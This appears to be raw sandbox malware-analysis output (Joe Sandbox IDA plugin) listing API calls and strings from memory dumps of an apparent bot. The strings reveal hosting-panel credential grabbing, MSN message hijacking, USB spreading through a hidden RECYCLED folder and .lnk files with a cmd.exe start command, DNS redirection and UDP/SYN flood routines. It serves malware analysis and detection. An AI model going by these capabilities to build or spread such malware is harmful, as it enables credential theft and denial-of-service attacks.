                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$_stricmp$_snprintf_vsnprintf$??3@CriticalSectionsprintf$CreateEnterFileLeavestrstr
                                                                  • String ID: %s-%s-%s$%s.%s ->> %s (%s : %s)$%s.%s ->> %s : %s$4)A$Directadmin$WHCMS$WHM$blog$cPanel$ffgrab$httplogin$iegrab
                                                                  • API String ID: 3716863481-1807948723
                                                                  APIs
                                                                  • strstr.MSVCRT ref: 00367C62
                                                                  • _stricmp.MSVCRT(?,cPanel,blog,%s-%s-%s,?,?,00000000), ref: 00367D58
                                                                  • _stricmp.MSVCRT(00000000,WHM), ref: 00367D71
                                                                  • _stricmp.MSVCRT(?,WHCMS), ref: 00367D8A
                                                                  • _stricmp.MSVCRT(?,Directadmin), ref: 00367DA3
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A335
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A34F
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A369
                                                                    • Part of subcall function 0036A310: _vsnprintf.MSVCRT ref: 0036A382
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A39A
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB,%s.%s,blk,?,?,000001FE,00370A8E), ref: 0036A3AD
                                                                    • Part of subcall function 0036A310: _snprintf.MSVCRT ref: 0036A3CC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB), ref: 0036A3DB
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A3EC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A3FB
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A404
                                                                    • Part of subcall function 0036A310: EnterCriticalSection.KERNEL32(003AAC34,?,?,00000000), ref: 0036A436
                                                                    • Part of subcall function 0036A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0036A452
                                                                    • Part of subcall function 0036A310: LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A464
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00367E02
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00367E12
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367401
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367419
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 00367431
                                                                    • Part of subcall function 003673E0: _snprintf.MSVCRT ref: 00367449
                                                                    • Part of subcall function 003673E0: _vsnprintf.MSVCRT ref: 0036746B
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 0036747A
                                                                    • Part of subcall function 00367330: memset.MSVCRT ref: 00367351
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(?), ref: 00367369
                                                                    • Part of subcall function 00367330: _snprintf.MSVCRT ref: 00367381
                                                                    • Part of subcall function 00367330: _vsnprintf.MSVCRT ref: 003673A3
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(00000000), ref: 003673B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$_stricmp$_snprintf_vsnprintf$??3@CriticalSectionsprintf$CreateEnterFileLeavestrstr
                                                                  • String ID: %s-%s-%s$%s.%s ->> %s (%s : %s)$%s.%s ->> %s : %s$4)7$Directadmin$WHCMS$WHM$blog$cPanel$ffgrab$httplogin$iegrab
                                                                  • API String ID: 3716863481-676380799
                                                                  APIs
                                                                  • sscanf.MSVCRT ref: 0040260F
                                                                    • Part of subcall function 004107D0: lstrlenA.KERNEL32(*&@,?,?,00000000,?,0040262A,?,00417008), ref: 004107DC
                                                                    • Part of subcall function 004107D0: lstrcpyA.KERNEL32(00000000,*&@,?,00417008), ref: 004107F9
                                                                  • strstr.MSVCRT ref: 0040264F
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  • atoi.MSVCRT(00000000), ref: 004026FB
                                                                  • atoi.MSVCRT(00000000), ref: 00402713
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040276B
                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040278C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004027F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$atoi$FreeHeap_snprintflstrcpymemsetsscanfstrstr
                                                                  • String ID: %s.p10-> Message hijacked!$%s.p10-> Message to %s hijacked!$%s.p21-> Message hijacked!$CAL $CAL %d %256s$MSG $MSG $SDG $X-MMS-IM-Format:$baddr$msn$msnint$msnmsg$msnu
                                                                  • API String ID: 1527159713-2027340701
                                                                  APIs
                                                                  • sscanf.MSVCRT ref: 0036260F
                                                                    • Part of subcall function 003707D0: lstrlenA.KERNEL32(*&6,?,?,00000000,?,0036262A,?,00377008), ref: 003707DC
                                                                    • Part of subcall function 003707D0: lstrcpyA.KERNEL32(00000000,*&6,?,00377008), ref: 003707F9
                                                                  • strstr.MSVCRT ref: 0036264F
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  • atoi.MSVCRT(00000000), ref: 003626FB
                                                                  • atoi.MSVCRT(00000000), ref: 00362713
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036276B
                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0036278C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003627F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$atoi$FreeHeap_snprintflstrcpymemsetsscanfstrstr
                                                                  • String ID: %s.p10-> Message hijacked!$%s.p10-> Message to %s hijacked!$%s.p21-> Message hijacked!$CAL $CAL %d %256s$MSG $MSG $SDG $X-MMS-IM-Format:$baddr$msn$msnint$msnmsg$msnu
                                                                  • API String ID: 1527159713-2027340701
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmp$AttributesFile_snprintfmemsetstrrchr$ExtensionFindPath
                                                                  • String ID: %windir%\system32\cmd.exe$&&%%windir%%\explorer.exe %%cd%%%s$.lnk$/c "start %%cd%%RECYCLED\%s$RECYCLED
                                                                  • API String ID: 1691573101-2902080580
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmp$AttributesFile_snprintfmemsetstrrchr$ExtensionFindPath
                                                                  • String ID: %windir%\system32\cmd.exe$&&%%windir%%\explorer.exe %%cd%%%s$.lnk$/c "start %%cd%%RECYCLED\%s$RECYCLED
                                                                  • API String ID: 1691573101-2902080580
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040E5B0
                                                                  • EnterCriticalSection.KERNEL32(0044B3C8), ref: 0040E5C9
                                                                  • strtok.MSVCRT ref: 0040E5FE
                                                                  • strstr.MSVCRT ref: 0040E617
                                                                  • strstr.MSVCRT ref: 0040E62D
                                                                  • strstr.MSVCRT ref: 0040E642
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E655
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E65B
                                                                  • lstrcpyA.KERNEL32(00000000,00411335), ref: 0040E678
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0040E687
                                                                    • Part of subcall function 00407500: lstrlenA.KERNEL32(?), ref: 0040752B
                                                                    • Part of subcall function 00407500: _snprintf.MSVCRT ref: 00407547
                                                                    • Part of subcall function 00407500: _vsnprintf.MSVCRT ref: 00407569
                                                                    • Part of subcall function 00407500: lstrcmpA.KERNEL32(?,bdns), ref: 0040758B
                                                                    • Part of subcall function 00407500: StrStrIA.SHLWAPI(?,00000000), ref: 0040759F
                                                                    • Part of subcall function 00407500: lstrlenA.KERNEL32(?), ref: 004075B9
                                                                  • strtok.MSVCRT ref: 0040E6CF
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040E71E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040E72D
                                                                  • LeaveCriticalSection.KERNEL32(0044B3C8), ref: 0040E73A
                                                                    • Part of subcall function 0040AA10: memset.MSVCRT ref: 0040AA31
                                                                    • Part of subcall function 0040AA10: lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 0040AA45
                                                                    • Part of subcall function 0040AA10: InternetOpenA.WININET(00000000,?,?,?,?), ref: 0040AA60
                                                                    • Part of subcall function 0040AA10: lstrlenA.KERNEL32(?), ref: 0040AA78
                                                                    • Part of subcall function 0040AA10: InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 0040AA8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$strstr$CriticalInternetOpenSectionlstrcpymemsetstrtok$??3@EnterFreeHeapLeave_snprintf_vsnprintflstrcmplstrcpyn
                                                                  • String ID: [DNS]: Blocked %d domain(s) - Redirected %d domain(s)$bdns$block
                                                                  • API String ID: 1940452476-536441337
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036E5B0
                                                                  • EnterCriticalSection.KERNEL32(003AB3C8), ref: 0036E5C9
                                                                  • strtok.MSVCRT ref: 0036E5FE
                                                                  • strstr.MSVCRT ref: 0036E617
                                                                  • strstr.MSVCRT ref: 0036E62D
                                                                  • strstr.MSVCRT ref: 0036E642
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036E655
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036E65B
                                                                  • lstrcpyA.KERNEL32(00000000,00371335), ref: 0036E678
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0036E687
                                                                    • Part of subcall function 00367500: lstrlenA.KERNEL32(?), ref: 0036752B
                                                                    • Part of subcall function 00367500: _snprintf.MSVCRT ref: 00367547
                                                                    • Part of subcall function 00367500: _vsnprintf.MSVCRT ref: 00367569
                                                                    • Part of subcall function 00367500: lstrcmpA.KERNEL32(?,bdns), ref: 0036758B
                                                                    • Part of subcall function 00367500: StrStrIA.SHLWAPI(?,00000000), ref: 0036759F
                                                                    • Part of subcall function 00367500: lstrlenA.KERNEL32(?), ref: 003675B9
                                                                  • strtok.MSVCRT ref: 0036E6CF
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036E71E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0036E72D
                                                                  • LeaveCriticalSection.KERNEL32(003AB3C8), ref: 0036E73A
                                                                    • Part of subcall function 0036AA10: memset.MSVCRT ref: 0036AA31
                                                                    • Part of subcall function 0036AA10: lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 0036AA45
                                                                    • Part of subcall function 0036AA10: InternetOpenA.WININET(00000000,?,?,?,?), ref: 0036AA60
                                                                    • Part of subcall function 0036AA10: lstrlenA.KERNEL32(?), ref: 0036AA78
                                                                    • Part of subcall function 0036AA10: InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 0036AA8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$strstr$CriticalInternetOpenSectionlstrcpymemsetstrtok$??3@EnterFreeHeapLeave_snprintf_vsnprintflstrcmplstrcpyn
                                                                  • String ID: [DNS]: Blocked %d domain(s) - Redirected %d domain(s)$bdns$block
                                                                  • API String ID: 1940452476-536441337
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Filewcsstr$Attributes$ExitMoveThread
                                                                  • String ID: %s.%S$DBWIN$\\.\pipe$brk$dll$exe$ruskill
                                                                  • API String ID: 294512176-1976196219
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Filewcsstr$Attributes$ExitMoveThread
                                                                  • String ID: %s.%S$DBWIN$\\.\pipe$brk$dll$exe$ruskill
                                                                  • API String ID: 294512176-1976196219
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0036B312
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0036B319
                                                                  • memset.MSVCRT ref: 0036B339
                                                                  • memset.MSVCRT ref: 0036B354
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0036B387
                                                                  • lstrcpynW.KERNEL32(?,?,00000004), ref: 0036B3A1
                                                                  • GetVolumeInformationW.KERNEL32 ref: 0036B3BB
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036B3D8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036B3F0
                                                                  • lstrcatW.KERNEL32(00000000,.exe), ref: 0036B461
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlenmemset$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpyn
                                                                  • String ID: .exe$30e44aa1$lol$lol.exe
                                                                  • API String ID: 1748614950-52295467
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040AA31
                                                                  • lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 0040AA45
                                                                  • InternetOpenA.WININET(00000000,?,?,?,?), ref: 0040AA60
                                                                  • lstrlenA.KERNEL32(?), ref: 0040AA78
                                                                  • InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 0040AA8C
                                                                  • HttpQueryInfoA.WININET(?,20000013,?,?,00000000), ref: 0040AAC0
                                                                  • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 0040AAE2
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AB15
                                                                  • InternetReadFile.WININET(00000000,?,00000FF8,00000001), ref: 0040AB67
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AB85
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040ABA5
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040ABE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$??2@OpenQuery$??3@AvailableCloseDataFileHandleHttpInfoReadlstrcpylstrlenmemset
                                                                  • String ID: Mozilla/4.0
                                                                  • API String ID: 2392773942-2634101963
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00413634,00000000,00000001,00413614,?), ref: 0040EE5B
                                                                  • memset.MSVCRT ref: 0040EE81
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040EE9A
                                                                  • lstrcatA.KERNEL32(00000000,00412C78), ref: 0040EEAE
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040EEBB
                                                                  • memset.MSVCRT ref: 0040EED5
                                                                  • SHGetFileInfoA.SHELL32(?,00000000,00000000,00000160,00001000), ref: 0040EEF4
                                                                  • memset.MSVCRT ref: 0040EF68
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040EF7B
                                                                  • lstrcatA.KERNEL32(00000000,.lnk), ref: 0040EF89
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0040EFA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcatmemset$lstrcpy$ByteCharCreateFileInfoInstanceMultiWide
                                                                  • String ID: .lnk$shell32.dll
                                                                  • API String ID: 3196525290-3399515747
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402243
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00402257
                                                                    • Part of subcall function 00409300: inet_addr.WS2_32(n"@), ref: 00409308
                                                                    • Part of subcall function 00409300: gethostbyname.WS2_32(n"@), ref: 00409313
                                                                  • htons.WS2_32(00000050), ref: 00402288
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00402297
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 004022AE
                                                                  • GetTickCount.KERNEL32 ref: 004022C3
                                                                  • GetTickCount.KERNEL32 ref: 004022F4
                                                                  • GetTickCount.KERNEL32 ref: 00402307
                                                                  • send.WS2_32(00000000,00000000,00000400,00000000), ref: 00402344
                                                                  • GetTickCount.KERNEL32 ref: 00402350
                                                                  • closesocket.WS2_32(00000000), ref: 00402363
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupclosesocketconnectgethostbynamehtonsinet_addrmemsetsendsocket
                                                                  • String ID: gfff$i.root-servers.org
                                                                  • API String ID: 99835129-3534201491
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00362243
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00362257
                                                                    • Part of subcall function 00369300: inet_addr.WS2_32(n"6), ref: 00369308
                                                                    • Part of subcall function 00369300: gethostbyname.WS2_32(n"6), ref: 00369313
                                                                  • htons.WS2_32(00000050), ref: 00362288
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00362297
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 003622AE
                                                                  • GetTickCount.KERNEL32 ref: 003622C3
                                                                  • GetTickCount.KERNEL32 ref: 003622F4
                                                                  • GetTickCount.KERNEL32 ref: 00362307
                                                                  • send.WS2_32(00000000,00000000,00000400,00000000), ref: 00362344
                                                                  • GetTickCount.KERNEL32 ref: 00362350
                                                                  • closesocket.WS2_32(00000000), ref: 00362363
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupclosesocketconnectgethostbynamehtonsinet_addrmemsetsendsocket
                                                                  • String ID: gfff$i.root-servers.org
                                                                  • API String ID: 99835129-3534201491
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409850
                                                                  • strtok.MSVCRT ref: 0040986E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040988B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 004098A8
                                                                  • strtok.MSVCRT ref: 004098B5
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 004098D1
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040999C
                                                                  Strings
                                                                  • [UDP]: Starting flood on "%s:%d" for %d second(s), xrefs: 0040993A
                                                                  • [UDP]: Finished flood on "%s:%d", xrefs: 00409970
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [UDP]: Finished flood on "%s:%d"$[UDP]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-2644890838
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004096D0
                                                                  • strtok.MSVCRT ref: 004096EE
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040970B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 00409728
                                                                  • strtok.MSVCRT ref: 00409735
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00409751
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040981C
                                                                  Strings
                                                                  • [SYN]: Starting flood on "%s:%d" for %d second(s), xrefs: 004097BA
                                                                  • [SYN]: Finished flood on "%s:%d", xrefs: 004097F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [SYN]: Finished flood on "%s:%d"$[SYN]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-3475151101
APIs
• memset.MSVCRT ref: 00369850
• strtok.MSVCRT ref: 0036986E
• HeapFree.KERNEL32(?,00000000,?), ref: 0036988B
• lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 003698A8
• strtok.MSVCRT ref: 003698B5
• HeapFree.KERNEL32(?,00000000,?), ref: 003698D1
• HeapFree.KERNEL32(?,00000000,?), ref: 0036999C
Strings
• [UDP]: Finished flood on "%s:%d", xrefs: 00369970
• [UDP]: Starting flood on "%s:%d" for %d second(s), xrefs: 0036993A
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: FreeHeap$strtok$lstrcpynmemset
• String ID: [UDP]: Finished flood on "%s:%d"$[UDP]: Starting flood on "%s:%d" for %d second(s)
• API String ID: 216847750-2644890838
APIs
• memset.MSVCRT ref: 003696D0
• strtok.MSVCRT ref: 003696EE
• HeapFree.KERNEL32(?,00000000,?), ref: 0036970B
• lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 00369728
• strtok.MSVCRT ref: 00369735
• HeapFree.KERNEL32(?,00000000,?), ref: 00369751
• HeapFree.KERNEL32(?,00000000,?), ref: 0036981C
Strings
• [SYN]: Finished flood on "%s:%d", xrefs: 003697F0
• [SYN]: Starting flood on "%s:%d" for %d second(s), xrefs: 003697BA
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: FreeHeap$strtok$lstrcpynmemset
• String ID: [SYN]: Finished flood on "%s:%d"$[SYN]: Starting flood on "%s:%d" for %d second(s)
• API String ID: 216847750-3475151101
APIs
• GetProcessHeap.KERNEL32 ref: 00410C89
• GetModuleFileNameA.KERNEL32(00000000,0044AA28,00000104), ref: 00410C9F
• GetModuleFileNameW.KERNEL32(00000000,0044A710,00000208), ref: 00410CB0
• GetWindowsDirectoryA.KERNEL32(0044AB30,00000104), ref: 00410CC0
  • Part of subcall function 004019F0: wcsrchr.MSVCRT ref: 004019F9
• InitializeCriticalSection.KERNEL32(0044AC34), ref: 00410CE3
• InitializeCriticalSection.KERNEL32(0044B4E4), ref: 00410CEA
• MoveFileExW.KERNEL32(0044A710,00000000,00000004), ref: 00410DA5
  • Part of subcall function 0040A150: memset.MSVCRT ref: 0040A170
  • Part of subcall function 0040A150: GetWindowsDirectoryW.KERNEL32(?,00000208,?,?,?), ref: 0040A184
  • Part of subcall function 0040A150: _memicmp.MSVCRT ref: 0040A1C3
• SetFileAttributesW.KERNEL32(0044A710,00000080), ref: 00410D96
• CreateThread.KERNEL32(00000000,00000000,Function_0000E9F0,00000000,00000000,00000000), ref: 00410DED
• CloseHandle.KERNEL32(00000000), ref: 00410DF4
Strings
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: File$CriticalDirectoryInitializeModuleNameSectionWindows$AttributesCloseCreateHandleHeapMoveProcessThread_memicmpmemsetwcsrchr
• String ID: %s.%S$brk$ruskill
• API String ID: 2870590860-2269373653
APIs
• GetProcessHeap.KERNEL32 ref: 00370C89
• GetModuleFileNameA.KERNEL32(00000000,003AAA28,00000104), ref: 00370C9F
• GetModuleFileNameW.KERNEL32(00000000,003AA710,00000208), ref: 00370CB0
• GetWindowsDirectoryA.KERNEL32(003AAB30,00000104), ref: 00370CC0
  • Part of subcall function 003619F0: wcsrchr.MSVCRT ref: 003619F9
• InitializeCriticalSection.KERNEL32(003AAC34), ref: 00370CE3
• InitializeCriticalSection.KERNEL32(003AB4E4), ref: 00370CEA
• MoveFileExW.KERNEL32(003AA710,00000000,00000004), ref: 00370DA5
  • Part of subcall function 0036A150: memset.MSVCRT ref: 0036A170
  • Part of subcall function 0036A150: GetWindowsDirectoryW.KERNEL32(?,00000208,?,?,?), ref: 0036A184
  • Part of subcall function 0036A150: _memicmp.MSVCRT ref: 0036A1C3
• SetFileAttributesW.KERNEL32(003AA710,00000080), ref: 00370D96
• CreateThread.KERNEL32(00000000,00000000,Function_0000E9F0,00000000,00000000,00000000), ref: 00370DED
• CloseHandle.KERNEL32(00000000), ref: 00370DF4
Strings
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: File$CriticalDirectoryInitializeModuleNameSectionWindows$AttributesCloseCreateHandleHeapMoveProcessThread_memicmpmemsetwcsrchr
• String ID: %s.%S$brk$ruskill
• API String ID: 2870590860-2269373653
APIs
• memset.MSVCRT ref: 0040A89E
  • Part of subcall function 00407790: memset.MSVCRT ref: 004077AE
  • Part of subcall function 00407790: memset.MSVCRT ref: 004077C8
  • Part of subcall function 00407790: lstrcpyA.KERNEL32(00000000,off), ref: 004077F0
  • Part of subcall function 00407790: _snprintf.MSVCRT ref: 0040780D
  • Part of subcall function 00407790: lstrlenA.KERNEL32(00000000), ref: 00407822
  • Part of subcall function 00407790: lstrlenA.KERNEL32(00000000), ref: 00407858
• _snprintf.MSVCRT ref: 0040A936
